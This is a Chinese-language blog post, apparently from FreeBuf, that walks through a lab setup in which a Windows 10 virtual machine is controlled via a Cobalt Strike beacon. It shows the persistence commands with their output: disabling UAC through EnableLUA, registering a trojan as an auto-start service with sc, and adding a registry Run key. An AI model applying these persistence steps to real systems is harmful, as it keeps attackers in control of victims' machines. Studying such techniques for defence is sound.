注册表后门持久的思考
calmness
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
注册表后门持久的思考
准备环境
windows10 虚拟机
Cobalt Strike【这里部署在Windows10上,服务器置于云上】
过程
远程木马控制了windows10虚拟机,利用Cobalt Strike
在Cobalt Strike下进入beacon
比较说明【可执行文件留持久后门】
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 的值改为0
把这个值改成0,这样在自己的电脑上操作才是真正的administrators
查询注册表信息
shell reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
EnableLUA 设置为1
EnableLUA 设置为0
beacon> shell sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe" 【填写自己木马路径】
[*] Tasked beacon to run: sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"
[+] host called home, sent: 94 bytes
[+] received output:
[SC] CreateService 成功
beacon> shell sc description "test" "测试" 【设置服务的描述】
[*] Tasked beacon to run: sc description "test" "测试"
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功
beacon> shell sc config "test" start= auto 【设置服务自启动】
[*] Tasked beacon to run: sc config "test" start= auto
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig 成功
beacon> shell net start "test" [启动服务]
[*] Tasked beacon to run: net start "test"
[+] host called home, sent: 47 bytes
[+] received output:
结果上线!!!
或者
直接插入注册表里,成为自启动文件
继续——添加后门生成
shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f
重启大法
依旧上线
补充一点:
beacon> shell cmd /k dir [*] Tasked beacon to run: cmd /k dir [+] host called home, sent: 41 bytes [+] received output:
驱动器 C 中的卷没有标签
卷的序列号是 88B7-95BE
C:\Users\calmness\Desktop 的目录
2020/09/21 13:07 <DIR> .
结束!!!
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 calmness 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

相关推荐
考核-迎检经验深入浅出
2025-02-10
安全服务工程师梳理网络
2025-02-04
数据安全体系建设自我思考
2025-01-11
文章目录